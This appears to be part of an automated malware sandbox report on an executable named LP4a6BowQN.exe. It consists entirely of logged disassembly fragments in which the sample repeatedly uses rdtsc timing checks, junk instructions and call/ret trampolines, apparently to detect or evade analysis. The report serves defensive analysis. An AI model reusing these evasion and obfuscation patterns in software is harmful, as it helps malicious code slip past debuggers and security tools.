                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F7D97 second address: 9F7D9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F7D9D second address: 9F7DA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC8BCFEEF06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F7DA7 second address: 9F7DB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F82FF second address: 9F8362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FC8BCFEEF08h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 push 00000000h 0x00000024 sub bx, F700h 0x00000029 push 00000000h 0x0000002b jl 00007FC8BCFEEF0Eh 0x00000031 pushad 0x00000032 jl 00007FC8BCFEEF0Ch 0x00000038 jnp 00007FC8BCFEEF0Bh 0x0000003e sbb ax, 36D2h 0x00000043 popad 0x00000044 push eax 0x00000045 jo 00007FC8BCFEEF1Dh 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F8362 second address: 9F8366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F84B0 second address: 9F84C7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC8BCFEEF08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FC8BCFEEF08h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F94F0 second address: 9F94F5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FA29B second address: 9FA2F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a adc ebx, 782A5C1Ah 0x00000010 push 00000000h 0x00000012 call 00007FC8BCFEEF0Ah 0x00000017 cmc 0x00000018 pop edi 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007FC8BCFEEF08h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 movsx ebx, bx 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jl 00007FC8BCFEEF12h 0x00000041 jmp 00007FC8BCFEEF0Ch 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F94F5 second address: 9F9573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007FC8BCD07024h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov bx, 27AFh 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 mov edi, dword ptr [ebp+122D2427h] 0x00000027 mov eax, dword ptr [ebp+122D09DDh] 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FC8BCD07018h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 mov dword ptr [ebp+122D1EDBh], eax 0x0000004d push FFFFFFFFh 0x0000004f mov dword ptr [ebp+122D2EBFh], ebx 0x00000055 nop 0x00000056 push eax 0x00000057 push edx 0x00000058 jnl 00007FC8BCD0701Ch 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F858A second address: 9F8597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 je 00007FC8BCFEEF0Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F8597 second address: 9F85BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jnl 00007FC8BCD07034h 0x0000000c pushad 0x0000000d jmp 00007FC8BCD07026h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FC1CD second address: 9FC1EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FC8BCFEEF08h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC8BCFEEF0Fh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FC1EF second address: 9FC23F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop esi 0x0000000d popad 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007FC8BCD07018h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D2EBFh], ebx 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 mov edi, ecx 0x00000034 pop ebx 0x00000035 push 00000000h 0x00000037 xchg eax, esi 0x00000038 jnp 00007FC8BCD07035h 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FC23F second address: 9FC265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCFEEF17h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FC8BCFEEF06h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FC265 second address: 9FC26F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9B248D second address: 9B2493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9B2493 second address: 9B2497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FC3B7 second address: 9FC3BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FC49D second address: 9FC4AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jg 00007FC8BCD07016h 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FF862 second address: 9FF870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FF870 second address: 9FF87A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FC8BCD07016h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FEA2B second address: 9FEA2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FF87A second address: 9FF926 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D2ECFh], edx 0x00000013 push ebx 0x00000014 sub ebx, dword ptr [ebp+1247E6D7h] 0x0000001a pop edi 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FC8BCD07018h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 mov di, 53E0h 0x0000003b jmp 00007FC8BCD07023h 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007FC8BCD07018h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 0000001Ah 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c jnp 00007FC8BCD07019h 0x00000062 xchg eax, esi 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 jmp 00007FC8BCD07026h 0x0000006b jmp 00007FC8BCD07024h 0x00000070 popad 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FEA2F second address: 9FEACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC8BCFEEF0Fh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FC8BCFEEF08h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 push dword ptr fs:[00000000h] 0x00000030 sub dword ptr [ebp+1246A7C5h], eax 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov eax, dword ptr [ebp+122D09EDh] 0x00000043 jne 00007FC8BCFEEF09h 0x00000049 mov dword ptr [ebp+124675D2h], edx 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push esi 0x00000054 call 00007FC8BCFEEF08h 0x00000059 pop esi 0x0000005a mov dword ptr [esp+04h], esi 0x0000005e add dword ptr [esp+04h], 00000017h 0x00000066 inc esi 0x00000067 push esi 0x00000068 ret 0x00000069 pop esi 0x0000006a ret 0x0000006b jmp 00007FC8BCFEEF0Dh 0x00000070 nop 0x00000071 push eax 0x00000072 push edx 0x00000073 jbe 00007FC8BCFEEF0Ch 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FF926 second address: 9FF930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FC8BCD07016h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FEACA second address: 9FEACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FF930 second address: 9FF934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9FEACE second address: 9FEAD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FC8BCFEEF06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A00929 second address: A00936 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A00A8C second address: A00A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A0299E second address: A029F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007FC8BCD07016h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jng 00007FC8BCD07022h 0x00000015 nop 0x00000016 xor di, 9326h 0x0000001b push 00000000h 0x0000001d mov dword ptr [ebp+12478414h], ebx 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007FC8BCD07018h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f mov edi, ebx 0x00000041 xchg eax, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A029F9 second address: A02A03 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC8BCFEEF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A02A03 second address: A02A0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A02BAF second address: A02BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A01ADC second address: A01AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC8BCD07016h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A02BB4 second address: A02BBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A05AE0 second address: A05AF2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A01AE6 second address: A01B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FC8BCFEEF08h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 call 00007FC8BCFEEF10h 0x0000002a push ecx 0x0000002b sub dword ptr [ebp+122D1E95h], ecx 0x00000031 pop ebx 0x00000032 pop edi 0x00000033 push dword ptr fs:[00000000h] 0x0000003a jbe 00007FC8BCFEEF0Bh 0x00000040 add di, E3BBh 0x00000045 mov dword ptr [ebp+122D2F23h], ebx 0x0000004b mov dword ptr fs:[00000000h], esp 0x00000052 cld 0x00000053 mov ebx, dword ptr [ebp+122D314Dh] 0x00000059 mov eax, dword ptr [ebp+122D0081h] 0x0000005f mov ebx, 09725B62h 0x00000064 push FFFFFFFFh 0x00000066 jo 00007FC8BCFEEF12h 0x0000006c jns 00007FC8BCFEEF0Ch 0x00000072 sub edi, 0EFAF955h 0x00000078 nop 0x00000079 push edi 0x0000007a pushad 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A05AF2 second address: A05AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A05AF8 second address: A05B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007FC8BCFEEF06h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FC8BCFEEF08h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 movzx edi, cx 0x0000002a or dword ptr [ebp+122D3810h], edx 0x00000030 push 00000000h 0x00000032 movzx ebx, ax 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007FC8BCFEEF08h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000019h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 mov ebx, 5C2E6F27h 0x00000056 xchg eax, esi 0x00000057 push ebx 0x00000058 jmp 00007FC8BCFEEF13h 0x0000005d pop ebx 0x0000005e push eax 0x0000005f pushad 0x00000060 jmp 00007FC8BCFEEF19h 0x00000065 jbe 00007FC8BCFEEF0Ch 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A04C21 second address: A04C33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A06A6C second address: A06ACE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FC8BCFEEF08h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov di, dx 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007FC8BCFEEF08h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 mov dword ptr [ebp+122D1ED5h], ebx 0x00000049 xchg eax, esi 0x0000004a jmp 00007FC8BCFEEF0Dh 0x0000004f push eax 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 push edi 0x00000054 pop edi 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A07B8B second address: A07B9D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FC8BCD07018h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A07C91 second address: A07C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A07C95 second address: A07C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A08AFD second address: A08B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A0AB1F second address: A0AB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC8BCD07023h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A0E609 second address: A0E60D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A0E60D second address: A0E613 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A0E613 second address: A0E619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A12B8F second address: A12B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC8BCD07016h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A1247E second address: A1248E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC8BCFEEF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A1248E second address: A12492 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A125D2 second address: A125DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A125DC second address: A125EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCD0701Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A17984 second address: A179E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jne 00007FC8BCFEEF18h 0x00000012 jns 00007FC8BCFEEF10h 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jc 00007FC8BCFEEF0Eh 0x00000023 jg 00007FC8BCFEEF08h 0x00000029 mov eax, dword ptr [eax] 0x0000002b push edx 0x0000002c jnc 00007FC8BCFEEF0Ch 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 push ecx 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A1D780 second address: A1D786 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A1D786 second address: A1D7BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jbe 00007FC8BCFEEF1Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A1D7BE second address: A1D7C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A1D7C2 second address: A1D7E8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC8BCFEEF18h 0x0000000d jng 00007FC8BCFEEF06h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A1DBC8 second address: A1DBCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A1DBCC second address: A1DBE9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC8BCFEEF13h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A1E05A second address: A1E08B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC8BCD07016h 0x0000000a js 00007FC8BCD07023h 0x00000010 jmp 00007FC8BCD0701Dh 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007FC8BCD0701Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A218FE second address: A21927 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 js 00007FC8BCFEEF3Bh 0x0000000d pushad 0x0000000e jmp 00007FC8BCFEEF19h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A2729A second address: A2729E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
